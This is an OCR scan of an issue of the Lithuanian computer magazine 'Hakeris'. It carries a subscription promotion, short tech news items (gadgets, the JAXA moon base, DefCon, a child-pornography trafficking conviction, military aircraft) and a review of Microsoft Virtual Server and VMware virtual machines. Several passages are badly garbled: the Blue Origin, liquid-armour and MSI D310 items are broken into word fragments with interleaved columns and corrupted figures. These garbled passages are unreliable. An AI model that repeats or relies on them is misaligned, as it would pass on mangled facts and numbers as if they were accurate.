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PRENUMERUOK ŽURNALĄ 

„HAKERIS“ IR SIŲSK SMS ŽINUTE NUMERIU Il " 4 

ŽINUTĖS LAUKELYJE ĮRAŠĘS 

HAK TARPAS VARDAS PAVARDE ADRESAS 
TU IŠ KARTO KARTU SU 
HAKERIS ŽURNALU GAUSI IR 
IŠSKIRTINĮ 


Kiekvienas užsiprenumeravęs žurnalą Hakeris 
ir atsiuntęs SMS žinutę turės galimybę laimėti ir 
pagrindinį prenumeratos akcijos prizą - naująjį 
MSI P640 MP3 grotuvą! 


4 MSI P640 (JO 
MP3 Video Photo Docs 


-g 
+ 4 Ypatingai plonas ir grakštus 
+ 48 GB talpos kietasis diskas! 
+ X 1,8 colių įstrižainės TFT-LCD ekranas! 
+ 5 MP3, WMA, WMA+DRM muzika! 
+ 14 Nuotraukos ir filmai! 
+ B FM radijas! 
+ 0 SRS (WOW) garso efektai! 
+ L 14 val. ličio baterija! 
+ > Užsienio kalbų mokymo funkcija! 
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> > NAUJIENOS 


Bad 


+ „LOGITECH“ SUVIENIJA VISĄ 
MUZIKĄ 


Pasirodė nauja informacija apie Logitech Wireless Music System 
projektą, kuris kompiuteriuose saugomą muziką perduoda į bet 
kokį muzikinį centrą arba akustinę sistemą ir visus garso įrašus 
valdo iš vieno pulto. Sujungimą planuojama realizuoti su belaidė 
Logitech Music Anywhere technologija, kuri leidžia atkurti visus 
populiarius muzikinius formatus. Tai atrodo štai taip: siųstuvas 
įjungiamas į kompiuterio USB lizdą, o imtuvas su muzikiniu centru 
sujungiamas per RCA arba ausinių lizdą. Veikimo spindulys sie- 
kia 50 metrų. Atskirai reikėtų paminėti nuotolinio valdymo pultelį 
Jame įdiegtas skystųjų kristalų ekranėlis su mėlynu apšvietimu ir 
valdymo rateliu, kuris turėtų palengvinti navigaciją po tavo bega- 
linę muzikos kolekciją. Jame taip pat įdiegtos kompozicijos arba 
viso albumo pridėjimo į eilę be atkūrimo sustabdymo funkcijos 
Pultelis pasikrauna iš parkavimo įrenginio (docking station), vieno 
pilno pakrovimo pakanka savaitei darbo. Europoje šis stebuklas 
greitai turėtų pasirodyti prekyboje, jo kaina sieks apie 250 eurų 


> PLONI IR GREITI 


Visiems mums savo optiniais kaupikliais žinoma kompanija „Ver- 
batim“ paruošė naujieną — naujo dizaino bei didesnį darbo greitį 
pripažįstančius Slimline serijos USB kaupiklius. Jų gabaritai siekia 
78x20x7 mm, paviršius apsaugotas gumine danga, kuri neleis 
įrenginiui išslysti iš tavo suprakaitavusių rankų. Šios serijos kaupi- 
klis Store'n'Go U3 Smart Drive pateikiamas su programų rinkiniu, 
kuriuo tu galėsi naudotis bet kokiame kompiuteryje. Į šį rinkinį įeina 
rezervinio kopijavimo įrankis Power Backup, sinchronizatorius 


> ĮVAIRIASPALVĖ „TRANSCEND“ 
ATMINTIS 


Kad šalto ir drėgno rudens dienomis tu ne taip smarkiai ilgė- 
tumeis vasaros, kompanija „Transcend“ išleido naują spalvotų 
flash atminties kortelių seriją JetFlash 160. | ją įeina nuo 512 
Mb iki 4 Gb talpos įrenginiai, kur kiekvienam konkrečios talpos 
modeliui skirta konkreti spalva. Pavyzdžiui, dabar tavo draugas 
niekada negalės tavęs mulkinti, tvirtindamas, kad jo raudonoje 
flash kortelėje gali tilpti 4 Gb informacijos, nes raudona spalva 
žymi dviejų gigabaitų įrenginius. Taigi pakanka tik įsiminti, kokia 
spalva atitinka kokią talpą 
spalvų šiuose įrenginiuose yra dar daug ko įdomaus. Juos gali- 
ma paversti užkrovimo įrenginiais arba priėjimą prie kompiuterio 
blokuojančiu atminties raktu. Flash atmintyje taip pat galima 
sukurti ypatingą slaptažodžiu apsaugotą particiją. Turėsi kur 
slėpti asmenines nuotraukas! Be to, šių įrenginių dizainas labai 
simpatiškas 


ir tavęs jau niekas neapgaus. Be 


Migo, dokumentų skaitymo įrankis Zinio 
pašto klientas Mozilla Thunderbird su 
antivirusu ir spamo filtrais, taip pat 
grafinis redaktorius ACDSee Photo 
Manager bei tavo duomenis slapta- 
žodžiu leidžianti apsaugoti progra- 
ma Pass2G0. Maksimali šių naujo- 
vių talpa siekia 4 Gb 
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„ £ NAUJIENOS 


>» MONITORIUS SU 
EMOCIJOMIS 


Manau, kad net ir labiausiai užkietėjęs kompiuterių maniakas, prie 
monitoriaus praleidžiantis po 24 valandas per parą, į pastarąjį nežiūri 
kaip į gyvą sutvėrimą. Kompanija LG nusprendė pakeisti pož į 
monitorių, kad mes jame matytume ne bedvasę mikroschemų ir kitų 
įrengimų mišrainę, o kažką mums šilto ir artimo. Nauja SK monitorių 
serija L1900 susideda iš trijų modelių: Jar (ąsotis), Ring (žiedas) ir 
Eclipse (užtemimas) 


Tačiau be dizaine- 
riškos minties apraiškų, kurios mumyse turėtų pažadinti kokius nors 


kurie skiriasi stovo forma 


jausmus ekranui, šioje serijoje įgyvendinti rimti techniniai pasiekimai 
Iš jų būtų galima paminėti DFC technologiją, dėl kurios kontrastin- 
jumas siekia 2001 vos 4 ms 
Monitorius taip pat suteikia galimybę jo parametrus konfigūruoti ne tik 


per monitoriaus meniu, bet ir su pele 


0:1. Vėlinimo laikas taip pat džiugina 


+ „ACME“ SUTEIKIA NAMUS 
LAPTOPUI 


„Acme“ laptopo krepšys 048 | 60 Lt 
„Acme“ laptopo krepšys 036 | 80 Lt 
„Acme“ laptopo kuprinė NA2 | 99 Lt 
www.acmemedia.lt 

Sakysi, jog šios kuprinės tėra kuprinės, tačiau juk būtent jo 
tavo „protą“, t.y. nešiojamąjį kompiuterį. Kur įsidėsi ausines ir MP3 
grotuvą, kai gatvėje tave užpuls lietus? Kur nešiosiesi mėg 
garso įrašų albumų kolekciją? Kuprinė arba krepš 


S ir saugo 


amiausių 


s — nepkeičiamas 


kelionių pagalbininkas. Jis ne tik saugo savo turinį, tačiau ir atlaisvina 
tavo rankas — juk ant pečių nešiojamas daiktas leidžia elgtis visiškai 
nevaržomam 


jamiesiems kompiuteriams, fotoaparatams diskams ir tt. Mi 


Acme“ pristato begalę naujų krepšių ir kuprinių nešio: 


Jačiu- 


pome tik keletą iš jų, nes visų čia nesutalpintume. Keletas dalykų 
kuriuos turėtum žinoti — „Acme“ krepšiai turi taip vadinamą „LifeTime 
Warranty“, todėl visų krepšių garantinis laiko tarpas yra neribotas. Be 
to, dauguma „Acme“ gaminių kainuoja 20-3096 mažiau, nei rinkoje 
esantys analogiški produktai. Kam švaistyti pinigus į balą? 


+ JAPONŲ MĖNULIO ATAKA PLANUOJAMA 2030 METAIS 


Maždaug taip Mėnulyje gyvens pirmieji naujakuriai 


Japonų žmonėms skirta bazė Mėnulyje bus baigta iki 2030 metų 
Apie tai Tokijuje vykusioje konferencijoje pareiškė japonų aero- 
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kosminės erdvės užvaldymo agentūros (JAXA) atstovai, kurie tuo 
pačiu pastebėjo, kad šiam ambicingam projektui lė 
skirta, Anksčiau japonai šnekėjo, kad Mėnulio bazė bus įkurta iki 
2025 metų ir joje apsigyvens į žmones panašūs robotai 
dabar androidai nukelti į antrąjį planą 
žmonės. Tai, kad projektui dar neskirta lėšų 
Plano įgyvendinimo darbai jau prasidėjo. Kitais metais 


kol kas nėra 


au 


0 į avangardą išsiveržia 
nėra jokia kliūtis 
JAXA ruo- 
šiasi į Mėnulio orbitą pasiųsti palydovą, kurį lydės nepilotuojamas 
kosminis laivas. Pastarasis turės nusileisti Mėnulyje ir surinkti 
pavyzdžius. Astronautai tenai iškeliaus maždaug 2020 m 
pradės bazės statybas, kurios bus pabaigtos per 10 metų. „Šio 
plano ateitis neaiški tik todėl, kad mes turime jti vyriausybės ir 
tautos palaiminimą, tačiau technologiškai visa tai įmanoma po kelių 
dešimtmečių", — teigė agentūros atstovas Satoki Kurokava. Abejoti 
galingųjų valstybių siekimu apgyvendinti Mėnulį nereikia: ant kortos 
pastatytas vertingo energetinio resurso, helio-3, valdymas. kurio 
perteklius randamas Mėnulio plutoje 


>> 


NAUJIENOS 


»KLAUSOMĖS LG 


Kompanija LG mums taip pat pristatė keletą naujų grotuvų. Modelis 
JM53 gali dirbti su MP3, WMA, BMP JPEG ir MPEG4 formatais, taip 
pat veikti kaip diktofonas. Grotuve įmontuotas 8 Gb talpos kietasis 
diskas. Valdymui skirtas prisilietimams jautrus ekranas (touch-pad) 
Tiems, kam už viską svarbiau stilius, tiks modelis FM20. Jis gami- 
namas gigabaito ir pusės gigabaito talpos. Be muzikos atkūrimo jis 
taip pat įrašinėja įmontuoto mikrofono priimamą signalą bei veikia 
kaip FM diapazono radijo imtuvas. Beje, jis leidžia įrašinėti priimamą 
radijo signalą. Paskutinis modelis vadinasi FM30. Šiame daugiafunk- 
ciniame įrenginyje gali būti įmontuota nuo 512 Mb iki 2 Gb atminties, 
jis veikia su MP3, WMA, BMP JPEG, MPEG4 ir TXT formatais, kurie 
demonstruojami SK ekrane su dideliais apžvalgos kampais. Akumu- 
liatoriai grotuvo veikimą užtikrina 60-čiai valandų. 


+ KINIJA PRIEŠ PIRATUS 


Kaip žinia, Kinija kartu su Rusija ir Ukraina yra laikoma piratavimo tvir- 
tove. Tiesa, priešingai nei mūsų rytų kaimynų valdininkai, kiniečiai rimtai 
nusprendė išgyvendinti šį reiškinį. Per pastarąsias 100 dienų ryžių tėvy- 
nėje CD pardavimo taškų atžvilgiu buvo vykdomos globalios represijos. 
Policija patikrino daugybę parduotuvėlių, iš kurių apie 10 tūkstančių 
pasirodė besą „nešvarios“. 3 tūkstančiai tokių krautuvių buvo uždaryta, 
likusios teks sumokėti mažiausiai 1250 dolerių baudas. Apie rimtus 
Kinijos ketinimus susidoroti su piratavimu kalba prekybos ministro pava- 
duotojas Czian Czenvėjus: „Artimiausius 3 metus mes ruošiamės įkurti 
50 intelektualios nuosavybės teisių apsaugos centrų. Taigi dabar mes 
griežtai stebėsime, kaip paisoma autoriaus teisių“. Tiesa, neapsiribosime 
vien tokiais centrais. Vyriausybė netgi ruošiasi Kinijos mokyklose pradėti 
dėstyti specialų dalyką, kur vaikams būtų skiepijama pagarba intelektinei 
nuosavybei. Be jokios abejonės, labiausiai ši naujiena nudžiugino JAV, 


kadangi pagrindinę pajamų dalį dėl piratavimo praranda būtent šios 
šalies kompanijos. Amerika jau ne vieną kartą reikalavo Kinijos imtis 
aktyvesnių veiksmų prieš piratus. Ką gi, dabar jai nebus ko skųstis! 


>» SENA GERA „DEFCON“ 


Eilinį kartą Las Vegase praėjo stambiausia hakerių konferencija Def- 
Con. Nuo 4 iki 6 rugpjūčio joje dalyvavo daugiau nei 6 tūkstančiai 
specialistų iš įvairių šalių, kurie kartu linksminosi, skaitė ir klausėsi 
pranešimų, dalyvavo įvairiuose konkursuose bei gėrė daug alaus 
Konkursai jau tapo neatsiejama konferencijos dalimi, o hakeriai čia 
gali nesibaiminti, kad juos suims. Parodyti savo sugebėjimus buvo 
galima keliose nominacijose: greitajame spynų nulaužime, sava- 
darbių robotų šaudyme į taikinius, geriausio šūkio konkurse (šios 
nominacijos laimėtojas — frazės „Visuomenė manęs nesupranta, 0 
technologija manęs bijo“ autorius), greitajame kavos gėrime. Svar- 
biausiu įvykiu tapo 3 dienas trukusios hakerių rungtynės, kuriose 
reikėjo užgrobti oponentų serverius ir juose saugomą informaciją 
Pavyzdžiui, reikėjo nulaužti ant kiekvienam šio renginio dalyviui įteikto 
ženklelio sumontuotą mikroschemą. Buvo paruošta apie 100 praneši- 
mų, jų autoriai — tiek menkai žinomi hakeriai, tiek ir kompiuterių sau- 
gumo srityje išgarsėję specialistai. Konferencijoje buvo svarstomas 
anonimiškumo pasauliniame voratinklyje klausimai, durims skirtų uni- 
versalių raktų gamyba, saugių ryšio kanalų organizavimo klausimai, 
įvairūs kompiuterinių nusikaltimų tyrimo niuansai bei dar daug kitų 
dalykų Žodžiu, buvo linksma. Išsamiau apie praėjusią konferenciją 
gali paskaityti oficialioje jos svetainėje: www.defcon.org 
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+ 25 METAI UŽ VAIKŲ ku 


JAV už vagystę galima gauti 3 metus laisvės atėmimo. Už 
nužudymą lengvinančiomis aplinkybėmis — 15 metų. Bal- 
tarusiams Jegorui Zolotariovui ir Aleksandrui Boiko buvo 


priteista 25 metai. Ne, jie nebandė susprogdinti Baltųjų rūmų 
ir nepardavinėjo valstybės paslapčių Irakui, — jie prekiavo 
vaikų pornografija. Jegoro ir Sanios kontora vadinosi „Reg- 
pay". ji valdė dešimtis child porno kategorijos svetainių, Vai- 
kinai turėjo pakankamai klientų — pažiūrėti į nuogų vaikučių 
žaidimus“ norėdavo tūkstančiai žmonių iš viso pasaulio, 
tarp kurių, kaip vėliau paaiškėjo, buvo ministrų, gydytojų 
iatrų, mokytojų. Pornografijos baronai buvo areštuoti 
dar prieš metus Europoje, o po to išvežti į JAV, kur jie kaltę 
pripažino. Draugeliai ne tik prekiavo pornogratija, bet ir 


užsiiminėjo neteisėtu pinigų plovimu. Kai policija apieškojo 
firmos biurą, seife buvo rasta 1,15 milijono dolerių, iš kurių 25 
tūkstančiai baudos pavidalu iškeliaus į JAV iždą. Kaip matai, 
vaikų pornografija — tai ne žaidimas, ir pasekmės gali būti 
labai rimtos. Kai kurie „Regpay“ klientai gavo daugiau nei 2 
metus kalėjimo vien tik už vaizdo klipų pirkimą. Pastebėtina 
tai, kad Baltarusija nesiuntė jokių prašymų išduoti Zolotariovą 
ir Boiko, kad juos būtų galima teisti tėvynėje. Bet juk tokiu 
atveju jiems skirta bausmė galėjo būti kur kas mažesnė 


+ BEPROPELERINIS JUODAS MALŪNSPARNIS MIESTO REIKMĖMS 


Daugelis svajojo apie oro taksi. Panašu į tai, kad pirmasis veikiantis 
egzempliorius jau sukurtas. Ir tai ne tik taksi, bet ir kovinė patruliavimui 
skirta mašina, galinti važinėti žeme. Fantastika? Anaiptol! Žinomame 
Farnboro aviacijos šou kompanijos „Bell Helicopter“ paviljone buvo pri- 
statytas sraigtasparnis hibridas X-Hawk Fancraft 


Kompanijos „Bell Helicopter“ ir „Urban Aeronautics“ praėjusiais metais 
bendradarbiavo, kad galėtų gauti amerikiečių vyriausybės finansavimą 
kovinės X-Hawk versijos tobulinimui, kad ją būtų galima panaudoti visų 
pirma kaip kovinį transportavimo-desantavimo aparatą. Virš publikos nuo 
masyvaus postamento kabojo juodas grobuoniškos išvaizdos aparatas 
su dviem šešiavamzdėm 20 mm kalibro patrankėlėm M61 Vulcan. Avia- 
cijos spaudai pranešti šio, savaime suprantama, neskraidančio modelio 
gabaritai: ilgis — 8,2 metro, plotis — 4 metrai, 0 aukštis — 3,3 metro (nors 
nuotraukose atrodo, kad X-Hawk mažesnis; galbūt jo dydis vis dėlto yra 
toks, kaip buvo skelbta anksčiau, t.y. 4,7 x 2,5 metro?) Šie gabaritai yra 
bent šiokie tokie faktai, o visa kita — iš viso vien tik teorija 


Pagal paskutinius įvertinimus toks X-Hawk galėtų skraidyti maksimaliu 
250 km/val greičiu maždaug 3,5 km aukštyje, su savimi gabendamas 
1362 kg naudingo svorio (pagal idėją, X-Hawk turėtų sutalpinti 11 karių ir 
vieną pilotą). Pačios mašinos svoris — apie 2 tonas 


Anksčiau to dar nebuvo, tačiau dabar tikimasi, kad aparatas galės važi- 
nėti gatvėmis, jo greitis sieks 16-19 km/val Sraigtasparnis X-Hawk 
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> MSI PLAUKIAĮ PLAČIUS 
VANDENIS 


MSI D310 | Pasirodys rudenį 

MSI P640 | 590 Lt 

Wwww.msi.com.tw 

Mes visi puikiai pažįstame kompaniją MSI. Šios trys raidės lydi 
kiekvieno tikro kompiuterinių žaidimų maniako dienotvarkę, tačiau 
naujosios MSI plokštės jau bando sudominti ir laisvalaikio prietaisų 
sektorių (patys matėme naująją plokštę su HDMI jungtimi). Bet šį 
kartą ne apie tai. MSI nusprendė parodyti, jog ir jie gali sukurti šį 
bei tą nešiojamo ir kartu praktiško. Turime du puikius prietaisus 
DVB-TV ir MP3 grotuvus. Būtent su šiais produktais kompanija 
MSI ir žada išplaukti į platesnius vandenis juk iki šiol apie jos 
produktus žinojo tik AK šeimininkai 


Labai įdomus D310 prietaisas. Tai pirmasis pasaulyje kišeninis 
DVB-T TV modelis. 4,2 colio įstrižainės TFT LCD ekranas ir plo- 
nas korpusas, prie kurio yra pridėti specialus stendas ir antena, 
televizija leidžia mėgautis bet kur ir bet kada. Infraraudonųjų 
spindulių nuotolinio valdymo pultelis palengvina DVB-T VHF/ 
UHF bangų paiešką, o AV jungtis leidžia prijungi didesnį ekraną 
arba garsiakalbius. Kas dar gali slėptis šiame mažame korpu- 
se? Kad ir kaip būtų keista, mes suradome SD ir MMC atminties 
kortelių lizdą, įkraunamą ličio bateriją, kuri DTV leidžia džiaugtis 
net iki 3 val., įrašytu vaizdu — 4 val., o garsu (dainos, balso 
pranešimai ir pan.) — net 5 val. Ir jis yra vos 1,56 cm pločio! 
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2 tokiam da funkcir 


Sveria lik 180 g! Art 
čiukui? Atsakymo ie 


ai įmanc 


), k gaminti 


Oti turbūt neve 


Bumbi, jog 


kokybiškus ir mu patinkančius daikčiukus 
gražuolis nieko neparodys? Fak šio MSI D310 vartc 


inių DVB kanalų (sk 


nt apie tai, ką Tau d 


gali džiaugtis net iki 300 tarpta 
u, jau nė nekal 


amų 


oru) teikiamu va anoja 


Lietuvos televizijų stotys 
a MP3 grotuvo. Puiki žinia — 


Nepatinka TV? Nori garso? Tad, 


tau net nebūtina jo ieškoti parduot renumeruok žurnalą 
Jį laimėti už dyką! Ne mėsi, firminį MSI kamuoliuką 
tikrai gausi dovanų 
Minėto MSI ginklo prieš iPodą markė P640. Nori sužinoti, ką jis 
turi? Prašau, išstudijuok žemiau pateiktą lentelę ir s si, Iš kokio 
„plieno“ nulietas šis gražuolis 
Ekranas 1,8 colių įstrižainė TFT LCD 
Talpa net 8 GB 
Formatai muzika: MP3, WMA, WMA+ DRM 
filmai: M-JPEG 
nuotrau JPEG 
Baterija 14 val. (įkraunama ličio jonų) 
Savybės 15 radijo stočių FM grotuvas su įrašinėjimo 


galimybė S (WOW, fektai, USB 2.0 


MP3 Direct Encoding funkcija 
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£ £ NAUJIENOS 


+ NUSILEIDIMAS ANT UODEGOS 


digu į ten skrendama ne su 


itu. Dar niekas nėra nusi- 


leidęs su ryškiu riaumojančios liepsnos stulpu, kaip tai mėgstama 


parod Imuose. Tačia 


erių metų tai bus įmanoma čia 


pasisekė tiems, kas irko bilietus iš kompanijos „Blue Origin 


kad aparate šiasi 


seniai tapo 


su kuriuo „Blue Origin“ rL 
ir kosminės erdvės ribos (100 kilometrų 


iki nominalios e 


tai tolimesnis eksperimentinės raketos 
(kitaip dar DC-X) tobulinimas, kurią kaž- 
inisterijos ir nacionalinės 
npanija „McDonr Douglas“ (pasta- 


vė i turistus 


elta Clipper Experiment 


kosmoso 


amerikiečių gynybc 


roji 1997 me į „Boeing“) 


Delta Clipper (veikiantis ateities stemų daugkartinio nau- 


ant iš įjungtų variklių besiveržiančios 
(pagrindas — maždaug 7 metrai 


smosą kils su skystu kuru (koncentruotu 


žibalu) varomais reaktyviniais varikliais 


dra kuro r 54 tonos, ir tai akivaizdžiai bus 


sės 


didžioji laivo ma 


alis. Variklių galia t 


siekti maždaug 100 tonų, todėl jie turėtų per 110 


ekundžių aparatą pakelti į 40 kilometrų aukštį ir pasiekti didelį greitį 


Blue Origin“ tvirti 


kad pirmi 10 jų Iė 


ivo skrydžio bandymų gali 


etais. Jie truks po minutę, raketa turėtų pasiekti maž- 


610 metrų aukštį, o svarbiausia — minkštai nu: 


+ SKYSTI ŠARVAI MŪŠIO LAUKE 


Greitai daugelio 


lių ginkluotė gali pasipildyti naujo tipo ekipuote, 


kuri kareivių kūnus G augoti geriau už šiuolaikines neperšau- 


namas liemenes. Bi 


Jros keleto JAV gynybos ministerijos vadovau- 
amų tyrimų laboratorijų pastangos leido sukurti patogią ir lanksčią 
naujo tipo apsaugą, vadinamą „skystaisiais šarvais“. Nauji „skysti 
rvai" leidžia ap: et kokias kūno vietas, jie gali susilenkti ir 


tuo pačiu neprarasti uginių savybių 

Mokslininkams tokio nuostabaus efekto pavyko pasiekti dėl specialaus 
kiauto, pripildyto supertvirtų nanodalelių ir negaruojančio 
skysčio tirpalu. Vos tik išorinį kiautą pradeda veikti mechaninis didelės 
energijos spaL as, nanodalelės susijungia į grupeles (klasterius) 
aip pakeičia tirpalo struktūrą, kuri pavirsta į tvirtą kompozitą Šis 
au nei milisekundę, kas leidžia karį 
bet ir nuo kulkos arba skeveldros 


apsauganči 


fazinis perėjimas įvyksta per me 


apsaugoti ne tik nuo smūgio peili 
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> Kosminis laivas DC-X 


Ielė 


ka 


Įprastinės eksploatacijos sąlygomis tokia apsauga 


S ir leidžia pripildyti „liemen 


čiausias skystis, arba „marškinių“ tipo 
kiautą. Mokslininkai taip pat pastebi, kad paprastai pjaunant ark 


pažeidžiamas kiautas po ių „konteineriu 


Iriant 


Idymo tampa ne 


kurios ir atlieka pagrindinę apsauginę funkc 
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audojimą labai papr 
ikratyti. Tam reikia p 


la, tačiau jeigu kalbama 
audoti nedideliu pa 
oneypot'ams, kad hakeriai ir virusai negalėtų 


Trumpa ekskursija į istoriją. Tie, kas prieš keletą metų 
stebėjo virtualių mašinų plėtojimąsi, pamena kompani- 
jos „Connectix“ sėkmę. Tenykščiai programuotojai taip 
sėkmingai kūrėir tobulino savo produktą Virtua/PC, kad 
2003 metais pati „Microsoft“ nepasikuklino ir už nemen- 
ką sumą nupirko pilnas tolimesnio sistemos plėtojimo 
teises. Tuo pačiu programinės įrangos gigantas „Virtu- 
al PC" atsisakė *nix tipo viešinčių OS (matyt, dėl viso 
pikto). Kiek vėliau „Microsoft“ anonsavo naują produktą 
— Virtual Server 2005. Jis yra loginis Virtual PC tęsinys ir 
šiuo metu yra beta testavimo stadijoje, tačiau jau dabar 
pelnė gerą reputaciją, todėl apie jį ir pakalbėsim. 
Virtual Server, priešingai nei VMware, veikia kaip pa- 
prasta programa, sisteminiu požiūriu tai yra Windows 
2003/XP servisas. Tai lemia rimtus apribojimus, kadangi 
betkokiakita OS negali veikti kaip pagrindinė (host) sis- 
tema. Dar daugiau, visos su kiekviena virtualia mašina 
susijusios bylos turi būti griežtai saugomos NTFS parti- 
cijose. Tai ypač kritiška, kadangi Virtual Server aktyviai 
naudoja šios failų sistemos ypatybes, taip pat kvotas 
bei praplėtimus. 

Manoma, kad su Virtua! Server galima įdiegti tik į Win- 
dows sistemą. Tačiau po neilgai trukusio dokumentaci- 
jos studijavimo paaiškėjo, kad įdiegti galima viską, ką 
tik nori, svarbiausia —kad diegiama sistema būtų skirta 
i386 architektūrai. Dar daugiau, sistemos kūrėjai tvirti- 
na, kad išleidus galutinę produkto versiją, bus oficialiai 
palaikomos kitos viešinčios OS, taip pat ir Linux. Tačiau 
dabarį panašias avantiūras reikia žiūrėti atsargiai. Nors 
pagrindinei sistemai tu ir nepakenksi, tačiau rizikuoji 
susigadinti nuotaiką ir nervus, jeigu su Virtua/ Server 
imsies diegti, tarkim, paskutinę FreeBSD versiją. Aš lin- 
kęstikėti, kad ateityje tokios problemos bus išspręstos, 
bent jau todėl, kad virtualiose mašinose Virtua/ Server 
emuliuoja realiai egzistuojančią aparatūrą, veikiančią 
paplitusių mikroschemų ir architektūrų pagrindu, Ki- 
taip tariant, virtualios mašinos vaizdo plokštė yra ypač 
populiari S3 Trio32/64, o tinklo plokštė — Intel 21140 
PCI Fast Ethernet Adapter. Tokiems įrenginiams skirtos 
tvarkyklės yra bet kokioje OS, o tai reiškia, kad galima 
tikėtis šimtaprocentinio suderinamumo. 

Be visų išvardintų dalykų, Virtua/ Server lengvai emu- 
liuoja IDE ir SCSI įrenginius, beje, virtualios viešinčių 
sistemų particijos saugomos specialiose bylose. Šios 
bylos taip ir vadinasi — Virtualūs Kietieji Diskai (Virtual 
Hard Disk, *.VHD). Juose saugoma tiek failų sistema 
su įdiegta OS, programomis bei kitomis bylomis, tiek ir 
techninė informacija su virtualaus procesoriaus būse- 
nos aprašymu, kas reikalinga tuo atveju, jeigu sistema 
buvo sustabdyta veikimo metu. Sistemos nuotraukų 


sukūrimo ir sistemos darbo atstatymo nuo sustojimo 
momento funkcija realizuota tiesiog puikiai, lygiai taip 
pat puikiai ji ir veikia, Vietoje keičiamų kaupiklių (tai visų 
pirma pasakytina apie CD-ROM) gali būti naudojami 
tiek realūs įrenginiai, tiek ir paprasčiausi diskų ISO at- 
vaizdai. Taigi norint įdiegti viešinčią sistemą, pakanka 
primontuoti disko atvaizdą su jos distributyvu. 
Tinklo konfigūravimo klausimas tradiciškai nusipelno ats- 
kiro aptarimo, tačiau čia jis, priešingai nei /Mware, nesu- 
kelia tiek sunkumų. Vartotojas turi galimybę tarpusavyje 
sujungti virtualias mašinas arba jas prijungti prie išorinių 
fizinių ir virtualių pagrindinės mašinos sąsajų. Beje, niekas 
netrukdo panaudoti DHCP/NATirvirtualiąsistemą prijung- 
tiprieišorinės sąsajos. Jeigusu VMware tinklo sąsajų MAC 
adresaibuvostatiniaiir kiekvieną kartątokie patys (dėlšios 
priežasties programos gali lengvai nustatyti, kad naudo- 
jamavirtuali mašina), tai Virtua/ Server atveju MAC adresą 
galima lengvai sukonfigūruoti rankiniu būdu arba įjungti 
automatinio paskirstymo opciją. 
Tam, kad tarpusavio sąveika tarp pagrindinės (host) ir 
viešinčios mašinos vyktų maksimaliai sklandžiai ir pato- 
giai, gamintojai siūlo įdiegti specialią priemonę — Vir- 
tual Machine Additions. Poįdiegimo iš esmės pagreitės 
išvedimas į virtualų darbastalį, o persijungimas tarp 
virtualaus ir realaus ekrano vyks kur kas paprasčiau 
(pabandyk ir suprasi, apie ką aš kalbu). 
Prisimenant unikalias ypatybes, norėtųsi paminėti nuo- 
tolinio virtualių mašinų valdymo sistemą. Visas šios ga- 
limybės grožis tame, kad valdymas vyksta per įprastinę 
web naršyklę, t.y. faktiškai iš bet kokio pasaulio taško! 
Kaip pagrindas čia naudojamas //S web serveris bei di- 
naminiai ASP (Active Service Pages) puslapiai su galin- 
gais ActiveX komponentais. Taip gamintojams pavyko 
web puslapyje atkurti virtualų ekraną, kuriame atvaiz- 
duojamas viešinčios operacinės sistemos darbastalis. 
Nėra koginčytis, tai iš tiesų nuostabus daikčiukas. Dar 
vienaįspūdinga sistemos priemonė yra Windows Scrip- 
ting Host technologija, leidžianti administratoriui sukurti 
nuosavus daugelio veiksmų automatizavimo skriptus. 
Panaudojant įmontuotą įvykių sistemą (VM įjungimas, 
atstatymas iš sustabdytos būsenos, išjungimas su iš- 
saugojimu, išjungimas be išsaugojimo ir t.t.), galima 
sukurti pačius įvairiausius skriptus, kurie gali visiškai 
valdyti virtualią mašiną. Norint suvokti realią šios siste- 
mosgalią, rekomenduoju pažiūrėtiį pagal nutylėjimą su 
Virtual Server pateikiamus skriptus. 
Jeigu.tau iškils PearPC konfigūravimo problemų, 

iai išstudijuok 

ir www.emaculai m. Daugeliu atvejų tu rasi 


atsakymą į savo klausimą, 


svetaines: www.pearpc.net 
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Aš nesumeluosiu pasakydamas, kad VMware —tai po- 
puliariausia virtualių mašinų kūrimo priemonė. Mes tuo 
žavėdamiesi jau rašėme apie jį prieš keletą metų — ly- 
giaitaip patrašomeir dabar. Be abejo, nuoto laiko daug 
kas pasikeitė, tačiau pagrindinis tikslas —idealios plat- 
formos sukūrimas viešinčių (guest) OS diegimui — išli- 
ko. Šiandien VMware produktų serijoje siūloma neviena 
programa, o iš karto kelios. Tarp VMware Workstation, 
VMware ESX Server, VMware VirtualCenter ir kitų pro- 
duktų mus visų pirma domina būtent Workstation versi- 
ja. Be jokios abejonės, serveriniai variantai vartotojams 
suteikia kur kas platesnes galimybes, tačiau, deja, 
visas šias grožybes patirti galima tik su meinfreimais. 
Taip pat, kad ir ką besakytum, vargu ar kasdieniniame 
darbe tau prireiks optimizavimo su 2 arba 4 proceso- 
riais dirbančioms sistemoms. Prieš pradedant apraši- 
nėti VMware galimybes, neblogai būtų išsiaiškinti, kas 
apskritai yratoji virtuali mašina. Iš esmės virtuali mašina 
— tai dirbtinai sukurta aplinka, kuri tiksliai emuliuoja 
pilnaverčio kompiuterio darbą. | tokią mašiną įdiegta 
operacinė sistema patikliai mano, kad dirba papras- 
čiausiame kompiuteryje, todėl niekaip neapriboja su 
ja dirbančių vartotojų. O reikiamų įrenginių emuliavimo 
būdai smarkiai skiriasi priklausomai nuo naudojamos 
programinės įrangos. VMware naudoja ypatingą būdą: 
kaip viešinčioms OS skirtą platformą ji generuoja kom- 
piuterį su „firmine“ aparatūrine įranga: su VMware Inc 
[VMware SVGA II] PCI Display Adapter vaizdo plokš- 
te, Advanced Micro Devices [AMD] 79c970 [PCnet 32 
LANCEJ tinklo plokšte, VMware Virtual IDE Hard Drive 
(arba VMware SCSI Hard Drive) kietaisiais diskais irt.t. 
Kaip žinia, operacinės sistemos žviegdamos diegiasi 
suegzotiškaįranga, dėlto, kad nėra normalių tvarkyklių, 
dažnai lūžinėja arba iš viso mirtinai pakimba ir atsisa- 
ko veikti. Tačiau tai tikrai ne mūsų atvejis! Visų pirma, 
VMware įranga virtualiai veikia labiausiai paplitusių 
modelių ir mikroschemų pagrindu, todėl dažniausiai 
parinkti tinkamą tvarkyklę visiškai nesunku. Antra, OS 
automatiškai atpažįsta VMware įrenginius ir puikiai su 
jais sąveikauja. Beje, tai visiškai nekeista įvertinustą po- 
puliarumą, kuriuo ši sistema dabar gali pasigirti. 
Virtualią mašiną galimasukurti per keletą sekundžių. Irtaip 
paprastą procesą palengvina specialus vedlys (wizard), 
kuris pilnai vadovauja tavo veiksmams. Tau tereikia nuro- 
dyti OS tipą, pageidautina konkrečią jos versiją, darbinį 
katalogą, kuriame bus saugojamos sisteminės bylos, taip 
